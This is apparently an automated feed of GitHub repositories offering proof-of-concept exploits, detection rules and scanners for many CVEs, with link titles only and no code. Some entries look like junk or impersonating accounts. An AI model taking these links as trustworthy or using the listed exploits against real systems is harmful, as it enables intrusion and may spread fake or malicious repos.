**PoC for exploiting CVE-2020-23851** : [JamesGeee/CVE-2020-23851](https://github.com/JamesGeee/CVE-2020-23851) create time: 2021-05-18T16:18:26Z

**PoC for exploiting CVE-2020-24421** : [JamesGeee/CVE-2020-24421](https://github.com/JamesGeee/CVE-2020-24421) create time: 2021-05-18T16:09:16Z

**PoC for exploiting CVE-2020-9389** : [JamesGeee/CVE-2020-9389](https://github.com/JamesGeee/CVE-2020-9389) create time: 2021-05-18T16:09:10Z

**PoC for exploiting CVE-2020-9388** : [JamesGeee/CVE-2020-9388](https://github.com/JamesGeee/CVE-2020-9388) create time: 2021-05-18T16:09:06Z

**PoC for exploiting CVE-2020-9390** : [JamesGeee/CVE-2020-9390](https://github.com/JamesGeee/CVE-2020-9390) create time: 2021-05-18T16:08:56Z

**PoC for exploiting CVE-2020-3864** : [JamesGeee/CVE-2020-3864](https://github.com/JamesGeee/CVE-2020-3864) create time: 2021-05-18T16:07:58Z

**PoC for exploiting CVE-2020-18102** : [JamesGeee/CVE-2020-18102](https://github.com/JamesGeee/CVE-2020-18102) create time: 2021-05-18T16:07:28Z

**PoC for exploiting CVE-2021-29603** : [JamesGeee/CVE-2021-29603](https://github.com/JamesGeee/CVE-2021-29603) create time: 2021-05-18T16:18:22Z

**PoC for exploiting CVE-2021-29602** : [JamesGeee/CVE-2021-29602](https://github.com/JamesGeee/CVE-2021-29602) create time: 2021-05-18T16:18:19Z

**PoC for exploiting CVE-2021-28465** : [JamesGeee/CVE-2021-28465](https://github.com/JamesGeee/CVE-2021-28465) create time: 2021-05-18T16:18:15Z

**PoC for exploiting CVE-2021-29425** : [JamesGeee/CVE-2021-29425](https://github.com/JamesGeee/CVE-2021-29425) create time: 2021-05-18T16:08:41Z

**PoC for exploiting CVE-2021-22117** : [JamesGeee/CVE-2021-22117](https://github.com/JamesGeee/CVE-2021-22117) create time: 2021-05-18T16:08:37Z

**PoC for exploiting CVE-2021-20266** : [JamesGeee/CVE-2021-20266](https://github.com/JamesGeee/CVE-2021-20266) create time: 2021-05-18T16:07:54Z

**PoC for exploiting CVE-2021-29478** : [JamesGeee/CVE-2021-29478](https://github.com/JamesGeee/CVE-2021-29478) create time: 2021-05-18T16:07:34Z

**PoC for exploiting CVE-2021-31180** : [JamesGeee/CVE-2021-31180](https://github.com/JamesGeee/CVE-2021-31180) create time: 2021-05-18T16:07:30Z

**PoC for exploiting CVE-2021-31916** : [JamesGeee/CVE-2021-31916](https://github.com/JamesGeee/CVE-2021-31916) create time: 2021-05-18T16:07:25Z

**PoC for exploiting CVE-2021-31899** : [JamesGeee/CVE-2021-31899](https://github.com/JamesGeee/CVE-2021-31899) create time: 2021-05-18T16:07:21Z

**PoC for exploiting CVE-2021-31793** : [JamesGeee/CVE-2021-31793](https://github.com/JamesGeee/CVE-2021-31793) create time: 2021-05-18T16:07:17Z

**PoC of CVE-2021-26814** : [CYS4srl/CVE-2021-26814](https://github.com/CYS4srl/CVE-2021-26814) create time: 2021-05-18T13:45:47Z

**ZendFramework_CVE-2021-3007 PoC** : [Vulnmachines/ZF3_CVE-2021-3007](https://github.com/Vulnmachines/ZF3_CVE-2021-3007) create time: 2021-05-18T14:16:02Z

**Apache Tomcat RCE (CVE-2020-9484)** : [RepublicR0K/CVE-2020-9484](https://github.com/RepublicR0K/CVE-2020-9484) create time: 2021-05-18T13:26:18Z

**no description** : [mavillon1/CVE-2020-1020-Exploit](https://github.com/mavillon1/CVE-2020-1020-Exploit) create time: 2021-05-18T07:53:26Z

**no description** : [kienquoc102/CVE-2018-9995-Exploit](https://github.com/kienquoc102/CVE-2018-9995-Exploit) create time: 2021-05-18T05:19:28Z

**no description** : [kienquoc102/Exploit-CVE-2018-9995](https://github.com/kienquoc102/Exploit-CVE-2018-9995) create time: 2021-05-18T03:01:31Z

**no description** : [m4udSec/Jenkins-Preauth-RCE-CVE-2019-1003000](https://github.com/m4udSec/Jenkins-Preauth-RCE-CVE-2019-1003000) create time: 2021-05-18T03:23:35Z

**Different rules to detect if CVE-2021-31166 is being exploited** : [Frankmock/CVE-2021-31166-detection-rules](https://github.com/Frankmock/CVE-2021-31166-detection-rules) create time: 2021-05-17T19:55:41Z

**Additional payloads and functions** : [johnjhacking/CVE-2021-22204-Payloads-and-Steps](https://github.com/johnjhacking/CVE-2021-22204-Payloads-and-Steps) create time: 2021-05-17T16:37:05Z

**PoC for CVE-2021-31166, a remote HTTP.sys use-after-free triggered remotely.** : [An0ny-m0us/CVE-2021-31166](https://github.com/An0ny-m0us/CVE-2021-31166) create time: 2021-05-17T11:12:45Z

**A simple python PoC to exploit CVE-2021-26814 and gain RCE on Wazuh Manager (v.4.0.0-4.0.3) through the API service.** : [WickdDavid/CVE-2021-26814](https://github.com/WickdDavid/CVE-2021-26814) create time: 2021-05-17T10:13:47Z

**Nmap NSE script to detect CVE-2019-14322 of Pallets Werkzeug path traversal via SharedDataMiddleware mishandles drive names (such as C:) in Windows pathnames** : [faisalfs10x/http-vuln-cve2019-14322.nse](https://github.com/faisalfs10x/http-vuln-cve2019-14322.nse) create time: 2021-05-17T07:48:19Z

**no description** : [nth347/CVE-2019-9081_poc](https://github.com/nth347/CVE-2019-9081_poc) create time: 2021-05-17T06:54:05Z

**no description** : [kienquoc102/Exploit-CVE-2018-9995](https://github.com/kienquoc102/Exploit-CVE-2018-9995) create time: 2021-05-17T03:37:54Z

**Pega Infinity Password Reset** : [Vulnmachines/CVE-2021-27651](https://github.com/Vulnmachines/CVE-2021-27651) create time: 2021-05-16T19:58:31Z

**no description** : [m4udSec/ProFTPD_CVE-2015-3306](https://github.com/m4udSec/ProFTPD_CVE-2015-3306) create time: 2021-05-16T18:57:14Z

**Proof of concept for CVE-2021-31166, a remote HTTP.sys use-after-free triggered remotely.** : [0vercl0k/CVE-2021-31166](https://github.com/0vercl0k/CVE-2021-31166) create time: 2021-05-16T16:15:56Z

**no description** : [kienquoc102/Exploit-CVE-2018-9995](https://github.com/kienquoc102/Exploit-CVE-2018-9995) create time: 2021-05-16T11:21:22Z

**no description** : [quocquoc181/CVE-2018-9995](https://github.com/quocquoc181/CVE-2018-9995) create time: 2021-05-16T09:55:57Z

**CVE-2019-14322: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')** : [faisalfs10x/CVE-2019-14322-scanner](https://github.com/faisalfs10x/CVE-2019-14322-scanner) create time: 2021-05-16T13:15:12Z

**RCE for Pega Infinity >= 8.2.1, Pega Infinity <= 8.5.2** : [samwcyo/CVE-2021-27651-PoC](https://github.com/samwcyo/CVE-2021-27651-PoC) create time: 2021-05-16T01:40:47Z

**Exploit CVE-2017-7494 for Net Security course final Assignment. This would reveal the vulnerability of services that run in administrative priority on Linux.** : [I-Rinka/BIT-EternalBlue-for-Linux](https://github.com/I-Rinka/BIT-EternalBlue-for-Linux) create time: 2021-05-15T06:52:23Z

**Exploit for CVE-2021-27342 vulnerability (telnet authentication brute-force protection bypass)** : [guywhataguy/D-Link-CVE-2021-27342-exploit](https://github.com/guywhataguy/D-Link-CVE-2021-27342-exploit) create time: 2021-05-15T01:22:19Z

**Just few tries to write PoC code for CVE-2021-31802 Netgear heap-based overflow RCE.** : [enty8080/CVE-2021-31802](https://github.com/enty8080/CVE-2021-31802) create time: 2021-05-14T15:19:34Z

**no description** : [kienquoc102/CVE-2018-995-Remake](https://github.com/kienquoc102/CVE-2018-995-Remake) create time: 2021-05-14T11:32:22Z

**CVE-2021-21300** : [tao-sun2/CVE-2021-21300](https://github.com/tao-sun2/CVE-2021-21300) create time: 2021-05-14T09:54:08Z

**CVE-2021-21300** : [tao-sun2/CVE-2021-21300](https://github.com/tao-sun2/CVE-2021-21300) create time: 2021-05-14T09:00:37Z

**This is a good projects.** : [TheCryingGame/CVE-2021-2021good](https://github.com/TheCryingGame/CVE-2021-2021good) create time: 2021-05-14T08:03:43Z

**This is modified code of 46635 exploit from python2 to python3.** : [SUNNYSAINI01001/46635.py_CVE-2019-9053](https://github.com/SUNNYSAINI01001/46635.py_CVE-2019-9053) create time: 2021-05-14T03:59:53Z

**Exploit for Exim4 4.93 CVE-2020-28018** : [lmol/CVE-2020-28018](https://github.com/lmol/CVE-2020-28018) create time: 2021-05-13T22:31:31Z

**weblogic CVE-2021-2109批量验证poc** : [yuaneuro/weblogic_CVE-2021-2109_poc](https://github.com/yuaneuro/weblogic_CVE-2021-2109_poc) create time: 2021-05-13T15:10:03Z

**A Python program implementing and exploiting the Minsky Turing machine considered in the paper "Intrinsic Propensity for Vulnerability in Computers? Arbitrary Code Execution in the Universal Turing Machine" as per CVE-2021-32471 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32471)** : [intrinsic-propensity/turing-machine](https://github.com/intrinsic-propensity/turing-machine) create time: 2021-01-21T10:39:42Z

**CVE-2020-9496和CVE_2020_9496利用dnslog批量验证漏洞poc及exp** : [yuaneuro/ofbiz-poc](https://github.com/yuaneuro/ofbiz-poc) create time: 2021-05-13T13:28:15Z

**Exploit to SYSTEM for CVE-2021-21551** : [waldo-irc/CVE-2021-21551](https://github.com/waldo-irc/CVE-2021-21551) create time: 2021-05-13T13:23:38Z

**no description** : [qzyqzynb/CVE-2020-27955](https://github.com/qzyqzynb/CVE-2020-27955) create time: 2021-05-13T10:30:28Z

**no description** : [Jarry1sec/CVE-2021-14562](https://github.com/Jarry1sec/CVE-2021-14562) create time: 2021-05-13T09:59:38Z

**no description** : [Jarry1sec/CVE-2021-20202](https://github.com/Jarry1sec/CVE-2021-20202) create time: 2021-05-13T09:36:50Z

**试图在ubuntu:20.04里复现CVE-2021-3156。但是失败了,请大佬看看问题出在哪里** : [wuuconix/CVE-2021-3156-Dockerfile-not-succeed](https://github.com/wuuconix/CVE-2021-3156-Dockerfile-not-succeed) create time: 2021-05-13T06:27:30Z

**CVE-2019-0708** : [yourekillingme/CVE-2019-0708](https://github.com/yourekillingme/CVE-2019-0708) create time: 2021-05-13T00:22:47Z

**no description** : [atorralba/CVE-2021-30005-POC](https://github.com/atorralba/CVE-2021-30005-POC) create time: 2020-03-27T18:41:07Z

**cve-2021** : [1151806933/cve-2021-2222222](https://github.com/1151806933/cve-2021-2222222) create time: 2021-05-12T15:43:05Z

**cve-2021** : [1151806933/cve-2021](https://github.com/1151806933/cve-2021) create time: 2021-05-12T15:01:49Z

**CVE-2020-28502 node-XMLHttpRequest RCE** : [s-index/CVE-2020-28502](https://github.com/s-index/CVE-2020-28502) create time: 2021-05-12T12:11:03Z

**no description** : [Magicsmx/CVE-2020.6_2021.3](https://github.com/Magicsmx/CVE-2020.6_2021.3) create time: 2021-05-12T09:07:02Z

**no description** : [se162xg/CVE-2021-22204](https://github.com/se162xg/CVE-2021-22204) create time: 2021-05-12T08:51:44Z

**exploits ATutor CVE-2016-2555** : [jrgdiaz/CVE-2016-2555](https://github.com/jrgdiaz/CVE-2016-2555) create time: 2021-05-12T04:24:27Z

**PoC for exploiting CVE-2017-10796** : [JamesGeee/CVE-2017-10796](https://github.com/JamesGeee/CVE-2017-10796) create time: 2021-05-12T01:50:28Z

**PoC for exploiting CVE-2020-5013** : [JamesGeee/CVE-2020-5013](https://github.com/JamesGeee/CVE-2020-5013) create time: 2021-05-12T01:51:05Z

**PoC for exploiting CVE-2020-4993** : [JamesGeee/CVE-2020-4993](https://github.com/JamesGeee/CVE-2020-4993) create time: 2021-05-12T01:50:55Z

**PoC for exploiting CVE-2020-4932** : [JamesGeee/CVE-2020-4932](https://github.com/JamesGeee/CVE-2020-4932) create time: 2021-05-12T01:50:48Z

**PoC for exploiting CVE-2020-4979** : [JamesGeee/CVE-2020-4979](https://github.com/JamesGeee/CVE-2020-4979) create time: 2021-05-12T01:50:38Z

**PoC for exploiting CVE-2020-4883** : [JamesGeee/CVE-2020-4883](https://github.com/JamesGeee/CVE-2020-4883) create time: 2021-05-12T01:50:35Z

**PoC for exploiting CVE-2020-4929** : [JamesGeee/CVE-2020-4929](https://github.com/JamesGeee/CVE-2020-4929) create time: 2021-05-12T01:50:32Z

**PoC for exploiting CVE-2020-19110** : [JamesGeee/CVE-2020-19110](https://github.com/JamesGeee/CVE-2020-19110) create time: 2021-05-12T01:48:40Z

**PoC for exploiting CVE-2020-19112** : [JamesGeee/CVE-2020-19112](https://github.com/JamesGeee/CVE-2020-19112) create time: 2021-05-12T01:48:37Z

**PoC for exploiting CVE-2020-19114** : [JamesGeee/CVE-2020-19114](https://github.com/JamesGeee/CVE-2020-19114) create time: 2021-05-12T01:48:34Z

**PoC for exploiting CVE-2020-19108** : [JamesGeee/CVE-2020-19108](https://github.com/JamesGeee/CVE-2020-19108) create time: 2021-05-12T01:48:31Z

**PoC for exploiting CVE-2020-19107** : [JamesGeee/CVE-2020-19107](https://github.com/JamesGeee/CVE-2020-19107) create time: 2021-05-12T01:48:22Z

**PoC for exploiting CVE-2020-19109** : [JamesGeee/CVE-2020-19109](https://github.com/JamesGeee/CVE-2020-19109) create time: 2021-05-12T01:48:13Z

**PoC for exploiting CVE-2020-13949** : [JamesGeee/CVE-2020-13949](https://github.com/JamesGeee/CVE-2020-13949) create time: 2021-05-12T01:47:55Z

**PoC for exploiting CVE-2020-27223** : [JamesGeee/CVE-2020-27223](https://github.com/JamesGeee/CVE-2020-27223) create time: 2021-05-12T01:47:52Z

**PoC for exploiting CVE-2020-4901** : [JamesGeee/CVE-2020-4901](https://github.com/JamesGeee/CVE-2020-4901) create time: 2021-05-12T01:46:54Z

**PoC for exploiting CVE-2021-29139** : [JamesGeee/CVE-2021-29139](https://github.com/JamesGeee/CVE-2021-29139) create time: 2021-05-12T01:50:25Z

**PoC for exploiting CVE-2021-30128** : [JamesGeee/CVE-2021-30128](https://github.com/JamesGeee/CVE-2021-30128) create time: 2021-05-12T01:50:22Z

**PoC for exploiting CVE-2021-29138** : [JamesGeee/CVE-2021-29138](https://github.com/JamesGeee/CVE-2021-29138) create time: 2021-05-12T01:50:11Z

**PoC for exploiting CVE-2021-29140** : [JamesGeee/CVE-2021-29140](https://github.com/JamesGeee/CVE-2021-29140) create time: 2021-05-12T01:49:40Z

**PoC for exploiting CVE-2021-32259** : [JamesGeee/CVE-2021-32259](https://github.com/JamesGeee/CVE-2021-32259) create time: 2021-05-12T01:49:36Z

**PoC for exploiting CVE-2021-29488** : [JamesGeee/CVE-2021-29488](https://github.com/JamesGeee/CVE-2021-29488) create time: 2021-05-12T01:49:33Z

**PoC for exploiting CVE-2021-27437** : [JamesGeee/CVE-2021-27437](https://github.com/JamesGeee/CVE-2021-27437) create time: 2021-05-12T01:49:30Z

**PoC for exploiting CVE-2021-21419** : [JamesGeee/CVE-2021-21419](https://github.com/JamesGeee/CVE-2021-21419) create time: 2021-05-12T01:49:27Z

**PoC for exploiting CVE-2021-29142** : [JamesGeee/CVE-2021-29142](https://github.com/JamesGeee/CVE-2021-29142) create time: 2021-05-12T01:49:24Z

**PoC for exploiting CVE-2021-29141** : [JamesGeee/CVE-2021-29141](https://github.com/JamesGeee/CVE-2021-29141) create time: 2021-05-12T01:48:56Z

**PoC for exploiting CVE-2021-29442** : [JamesGeee/CVE-2021-29442](https://github.com/JamesGeee/CVE-2021-29442) create time: 2021-05-12T01:48:49Z

**PoC for exploiting CVE-2021-31778** : [JamesGeee/CVE-2021-31778](https://github.com/JamesGeee/CVE-2021-31778) create time: 2021-05-12T01:48:46Z

**PoC for exploiting CVE-2021-31777** : [JamesGeee/CVE-2021-31777](https://github.com/JamesGeee/CVE-2021-31777) create time: 2021-05-12T01:48:43Z

**PoC for exploiting CVE-2021-2321** : [JamesGeee/CVE-2021-2321](https://github.com/JamesGeee/CVE-2021-2321) create time: 2021-05-12T01:48:05Z

**PoC for exploiting CVE-2021-27480** : [JamesGeee/CVE-2021-27480](https://github.com/JamesGeee/CVE-2021-27480) create time: 2021-05-12T01:48:02Z

**PoC for exploiting CVE-2021-22660** : [JamesGeee/CVE-2021-22660](https://github.com/JamesGeee/CVE-2021-22660) create time: 2021-05-12T01:47:59Z

**PoC for exploiting CVE-2021-28165** : [JamesGeee/CVE-2021-28165](https://github.com/JamesGeee/CVE-2021-28165) create time: 2021-05-12T01:47:49Z

**PoC for exploiting CVE-2021-28164** : [JamesGeee/CVE-2021-28164](https://github.com/JamesGeee/CVE-2021-28164) create time: 2021-05-12T01:47:42Z

**PoC for exploiting CVE-2021-28163** : [JamesGeee/CVE-2021-28163](https://github.com/JamesGeee/CVE-2021-28163) create time: 2021-05-12T01:47:10Z

**PoC for exploiting CVE-2021-28168** : [JamesGeee/CVE-2021-28168](https://github.com/JamesGeee/CVE-2021-28168) create time: 2021-05-12T01:47:05Z

**PoC for exploiting CVE-2021-29495** : [JamesGeee/CVE-2021-29495](https://github.com/JamesGeee/CVE-2021-29495) create time: 2021-05-12T01:47:01Z

**PoC for exploiting CVE-2021-22677** : [JamesGeee/CVE-2021-22677](https://github.com/JamesGeee/CVE-2021-22677) create time: 2021-05-12T01:46:58Z

**PoC for exploiting CVE-2021-31779** : [JamesGeee/CVE-2021-31779](https://github.com/JamesGeee/CVE-2021-31779) create time: 2021-05-12T01:46:51Z

**PoC for exploiting CVE-2021-28271** : [JamesGeee/CVE-2021-28271](https://github.com/JamesGeee/CVE-2021-28271) create time: 2021-05-12T01:46:41Z

**no description** : [m4udSec/Cacti-CVE-2020-8813](https://github.com/m4udSec/Cacti-CVE-2020-8813) create time: 2021-05-11T22:38:39Z

**Python exploit for the CVE-2021-22204 vulnerability in Exiftool** : [convisoappsec/CVE-2021-22204-exiftool](https://github.com/convisoappsec/CVE-2021-22204-exiftool) create time: 2021-05-11T18:45:07Z

**no description** : [waleedassar/CVE-2021-31184](https://github.com/waleedassar/CVE-2021-31184) create time: 2021-05-11T17:52:22Z

**Poc for CVE-2019-9081** : [nth347/CVE-2019-9081_poc](https://github.com/nth347/CVE-2019-9081_poc) create time: 2021-05-11T13:24:19Z

**Exploit for Node-jose < 0.11.0 written in Ruby** : [scumdestroy/CVE-2018-0114](https://github.com/scumdestroy/CVE-2018-0114) create time: 2021-05-11T11:29:15Z

**POC Exploit written in Ruby** : [scumdestroy/CVE-2019-5420.rb](https://github.com/scumdestroy/CVE-2019-5420.rb) create time: 2021-05-11T11:32:18Z

**no description** : [woliujizhou/cve-2021-2222](https://github.com/woliujizhou/cve-2021-2222) create time: 2021-05-11T12:26:34Z

**no description** : [woliujizhou/CVE-2021-1111](https://github.com/woliujizhou/CVE-2021-1111) create time: 2021-05-11T12:23:07Z

**no description** : [r0ckysec/CVE-2021-29200](https://github.com/r0ckysec/CVE-2021-29200) create time: 2021-05-11T10:40:20Z

**CVE-2021-30461** : [Al1ex/CVE-2021-30461](https://github.com/Al1ex/CVE-2021-30461) create time: 2021-05-11T04:09:04Z

**Check YouTube - https://youtu.be/O0ZnLXRY5Wo** : [exploitblizzard/CVE-2020-14882-WebLogic](https://github.com/exploitblizzard/CVE-2020-14882-WebLogic) create time: 2021-05-10T21:32:36Z

**PoC for exploiting CVE-2020-36326** : [JamesGeee/CVE-2020-36326](https://github.com/JamesGeee/CVE-2020-36326) create time: 2021-05-09T22:55:19Z

**PoC for exploiting CVE-2020-23127** : [JamesGeee/CVE-2020-23127](https://github.com/JamesGeee/CVE-2020-23127) create time: 2021-05-09T22:55:13Z

**PoC for exploiting CVE-2020-17517** : [JamesGeee/CVE-2020-17517](https://github.com/JamesGeee/CVE-2020-17517) create time: 2021-05-09T22:55:10Z

**PoC for exploiting CVE-2021-28269** : [JamesGeee/CVE-2021-28269](https://github.com/JamesGeee/CVE-2021-28269) create time: 2021-05-09T22:55:44Z

**PoC for exploiting CVE-2021-30642** : [JamesGeee/CVE-2021-30642](https://github.com/JamesGeee/CVE-2021-30642) create time: 2021-05-09T22:55:38Z

**PoC for exploiting CVE-2021-30502** : [JamesGeee/CVE-2021-30502](https://github.com/JamesGeee/CVE-2021-30502) create time: 2021-05-09T22:55:29Z

**PoC for exploiting CVE-2021-20716** : [JamesGeee/CVE-2021-20716](https://github.com/JamesGeee/CVE-2021-20716) create time: 2021-05-09T22:55:25Z

**PoC for exploiting CVE-2021-30165** : [JamesGeee/CVE-2021-30165](https://github.com/JamesGeee/CVE-2021-30165) create time: 2021-05-09T22:55:22Z

**PoC for exploiting CVE-2021-31826** : [JamesGeee/CVE-2021-31826](https://github.com/JamesGeee/CVE-2021-31826) create time: 2021-05-09T22:55:16Z

**PoC for exploiting CVE-2021-28125** : [JamesGeee/CVE-2021-28125](https://github.com/JamesGeee/CVE-2021-28125) create time: 2021-05-09T22:55:06Z

**Nginx ngx_http_range_filter_module Integer Overflow (CVE-2017-7529)** : [Gaurav-Jadhav/CVE-2017-7529](https://github.com/Gaurav-Jadhav/CVE-2017-7529) create time: 2021-05-09T14:11:03Z

**Exploit proof of concept for EVGA's WinRing0 device driver.** : [Crystalware/CVE-2020-14979](https://github.com/Crystalware/CVE-2020-14979) create time: 2021-05-09T13:16:03Z

**Proof of concept for the HWiNFO AMD64 Null Pointer Dereference vulnerability.** : [Crystalware/CVE-2018-8060](https://github.com/Crystalware/CVE-2018-8060) create time: 2021-05-09T11:04:59Z

**Apache Solr RCE CVE-2020-13957** : [s-index/CVE-2020-13957](https://github.com/s-index/CVE-2020-13957) create time: 2021-05-09T06:42:41Z

**XStream SSRF CVE-2021-21349** : [s-index/CVE-2021-21349](https://github.com/s-index/CVE-2021-21349) create time: 2021-05-09T06:50:31Z

**XStream DoS CVE-2021-21341** : [s-index/CVE-2021-21341](https://github.com/s-index/CVE-2021-21341) create time: 2021-05-09T06:46:38Z

**this_is_a_test** : [FirDragon/CVE-2021-0000_this_is_a_test](https://github.com/FirDragon/CVE-2021-0000_this_is_a_test) create time: 2021-05-09T06:17:54Z

**CVE-2017-7494 python exploit** : [m4udSec/noSAMBAnoCRY-CVE-2017-7494](https://github.com/m4udSec/noSAMBAnoCRY-CVE-2017-7494) create time: 2021-05-09T02:32:54Z

**no description** : [goout2/cve-2021-00001](https://github.com/goout2/cve-2021-00001) create time: 2021-05-08T03:26:42Z

**POC and description for CVE-2021-28312** : [shubham0d/CVE-2021-28312](https://github.com/shubham0d/CVE-2021-28312) create time: 2021-05-07T20:16:22Z

**CVE-2019-2215** : [mufidmb38/CVE-2019-2215](https://github.com/mufidmb38/CVE-2019-2215) create time: 2021-05-07T16:48:40Z

**CVE-2020-9496 manual exploit** : [cyber-niz/CVE-2020-9496](https://github.com/cyber-niz/CVE-2020-9496) create time: 2021-05-07T16:50:23Z

**A rewritten Metasploit old exploit for the vsftpd service [CVE 2011-2523]** : [davidlares/vsftpd-exploitation](https://github.com/davidlares/vsftpd-exploitation) create time: 2021-05-07T16:03:01Z

**no description** : [Ishan3011/CVE-2021-3493](https://github.com/Ishan3011/CVE-2021-3493) create time: 2021-05-07T15:01:25Z

**VOIP RCE** : [Vulnmachines/CVE-2021-30461](https://github.com/Vulnmachines/CVE-2021-30461) create time: 2021-05-07T09:22:01Z

**no description** : [r90tpass/cve-2021-4555](https://github.com/r90tpass/cve-2021-4555) create time: 2021-05-07T07:50:51Z

**test** : [r90tpass/cve-2021-xinsougggg](https://github.com/r90tpass/cve-2021-xinsougggg) create time: 2021-05-07T07:49:20Z

**test666** : [r90tpass/cve-2021-test](https://github.com/r90tpass/cve-2021-test) create time: 2021-05-07T07:33:22Z

**no description** : [r90tpass/cve-2021-qifei](https://github.com/r90tpass/cve-2021-qifei) create time: 2021-05-07T07:23:03Z

**fsdfsdfsdfsdf** : [r90tpass/cve-2021-12366612312312](https://github.com/r90tpass/cve-2021-12366612312312) create time: 2021-05-07T07:19:13Z

**PoC demo for CVE-2019-8852, a tfp0 bug.** : [pattern-f/CVE-2019-8852](https://github.com/pattern-f/CVE-2019-8852) create time: 2021-03-31T11:36:47Z

**Demo exploit code for CVE-2020-27904, a tfp0 bug.** : [pattern-f/xattr-oob-swap](https://github.com/pattern-f/xattr-oob-swap) create time: 2021-03-31T09:11:29Z

**CVE-2021-30461** : [daedalus/CVE-2021-30461](https://github.com/daedalus/CVE-2021-30461) create time: 2021-05-06T22:50:32Z

**PoC for exploiting CVE-2020-25453** : [JamesGeee/CVE-2020-25453](https://github.com/JamesGeee/CVE-2020-25453) create time: 2021-05-06T21:45:19Z

**PoC for exploiting CVE-2021-31795** : [JamesGeee/CVE-2021-31795](https://github.com/JamesGeee/CVE-2021-31795) create time: 2021-05-06T21:45:50Z

**PoC for exploiting CVE-2021-31417** : [JamesGeee/CVE-2021-31417](https://github.com/JamesGeee/CVE-2021-31417) create time: 2021-05-06T21:45:44Z

**PoC for exploiting CVE-2021-31418** : [JamesGeee/CVE-2021-31418](https://github.com/JamesGeee/CVE-2021-31418) create time: 2021-05-06T21:45:30Z

**PoC for exploiting CVE-2021-31420** : [JamesGeee/CVE-2021-31420](https://github.com/JamesGeee/CVE-2021-31420) create time: 2021-05-06T21:45:26Z

**PoC for exploiting CVE-2021-31419** : [JamesGeee/CVE-2021-31419](https://github.com/JamesGeee/CVE-2021-31419) create time: 2021-05-06T21:45:22Z

**PoC for exploiting CVE-2021-31828** : [JamesGeee/CVE-2021-31828](https://github.com/JamesGeee/CVE-2021-31828) create time: 2021-05-06T21:45:15Z

**PoC for exploiting CVE-2021-21536** : [JamesGeee/CVE-2021-21536](https://github.com/JamesGeee/CVE-2021-21536) create time: 2021-05-06T21:45:12Z

**PoC for exploiting CVE-2021-21535** : [JamesGeee/CVE-2021-21535](https://github.com/JamesGeee/CVE-2021-21535) create time: 2021-05-06T21:45:08Z

**PoC for exploiting CVE-2021-21534** : [JamesGeee/CVE-2021-21534](https://github.com/JamesGeee/CVE-2021-21534) create time: 2021-05-06T21:43:49Z

**Vulnerability in zam64.sys, zam32.sys allowing ring 0 code execution.** : [irql0/CVE-2021-31728](https://github.com/irql0/CVE-2021-31728) create time: 2021-05-04T17:15:58Z

**no description** : [IanSmith123/CVE-2020-27955](https://github.com/IanSmith123/CVE-2020-27955) create time: 2021-05-06T05:36:05Z

**no description** : [goout2/cve-2021-111223](https://github.com/goout2/cve-2021-111223) create time: 2021-05-06T06:12:16Z

**no description** : [getin63/CVE-2021-55456](https://github.com/getin63/CVE-2021-55456) create time: 2021-05-06T06:09:33Z

**no description** : [getin63/CVE-2021-113541](https://github.com/getin63/CVE-2021-113541) create time: 2021-05-06T05:58:48Z

**no description** : [IanSmith123/cve-2020-27955](https://github.com/IanSmith123/cve-2020-27955) create time: 2021-05-06T04:18:48Z

**no description** : [getin63/CVE-2021-11021](https://github.com/getin63/CVE-2021-11021) create time: 2021-05-06T04:08:03Z

**no description** : [GoogleProjectZer0/CVE-2020-22785](https://github.com/GoogleProjectZer0/CVE-2020-22785) create time: 2021-05-05T22:06:48Z

**no description** : [GoogleProjectZer0/CVE-2020-22783](https://github.com/GoogleProjectZer0/CVE-2020-22783) create time: 2021-05-05T22:00:29Z

**no description** : [GoogleProjectZer0/CVE-2021-24258](https://github.com/GoogleProjectZer0/CVE-2021-24258) create time: 2021-05-05T22:07:12Z

**no description** : [GoogleProjectZer0/CVE-2021-24265](https://github.com/GoogleProjectZer0/CVE-2021-24265) create time: 2021-05-05T22:07:09Z

**no description** : [GoogleProjectZer0/CVE-2021-24276](https://github.com/GoogleProjectZer0/CVE-2021-24276) create time: 2021-05-05T22:07:05Z

**no description** : [GoogleProjectZer0/CVE-2021-24273](https://github.com/GoogleProjectZer0/CVE-2021-24273) create time: 2021-05-05T22:07:02Z

**no description** : [GoogleProjectZer0/CVE-2021-24260](https://github.com/GoogleProjectZer0/CVE-2021-24260) create time: 2021-05-05T22:06:58Z

**no description** : [GoogleProjectZer0/CVE-2021-24268](https://github.com/GoogleProjectZer0/CVE-2021-24268) create time: 2021-05-05T22:06:55Z

**no description** : [GoogleProjectZer0/CVE-2021-26909](https://github.com/GoogleProjectZer0/CVE-2021-26909) create time: 2021-05-05T22:06:51Z

**no description** : [GoogleProjectZer0/CVE-2021-20708](https://github.com/GoogleProjectZer0/CVE-2021-20708) create time: 2021-05-05T22:06:44Z

**cve-2019-8942, cve-2019-8943** : [synod2/WP_CROP_RCE](https://github.com/synod2/WP_CROP_RCE) create time: 2021-05-05T16:23:03Z

**CVE-2019-1388 Abuse UAC Windows Certificate Dialog** : [nobodyatall648/CVE-2019-1388](https://github.com/nobodyatall648/CVE-2019-1388) create time: 2021-05-05T08:22:34Z

**no description** : [ssst0n3/CVE-2021-31856](https://github.com/ssst0n3/CVE-2021-31856) create time: 2021-05-05T07:18:26Z

**no description** : [ajtech-hue/CVE-2021-3156-Mitigation-ShellScript-Build](https://github.com/ajtech-hue/CVE-2021-3156-Mitigation-ShellScript-Build) create time: 2021-05-05T04:51:03Z

**CVE-2021-30128 Apache OFBiz 反序列化漏洞远程代码执行** : [r0ckysec/CVE-2021-30128](https://github.com/r0ckysec/CVE-2021-30128) create time: 2021-05-04T16:21:55Z

**This repo describes a vulnerability affecting the QR code based pairing process of the eWeLink IoT devices (CVE-2020-12702).** : [salgio/eWeLink-QR-Code](https://github.com/salgio/eWeLink-QR-Code) create time: 2021-05-04T14:50:07Z

**CVE-2003-0264 SLMail5.5_RemoteBufferOverflow** : [nobodyatall648/CVE-2003-0264](https://github.com/nobodyatall648/CVE-2003-0264) create time: 2021-05-01T15:06:44Z

**CVE-2009-0182 VUPlayer2.49_LocalBufferOverflow** : [nobodyatall648/CVE-2009-0182](https://github.com/nobodyatall648/CVE-2009-0182) create time: 2021-05-01T15:07:32Z

**Proof of Concept for CVE-2021-28443** : [nghiadt1098/ByeDisk](https://github.com/nghiadt1098/ByeDisk) create time: 2021-05-04T02:36:27Z

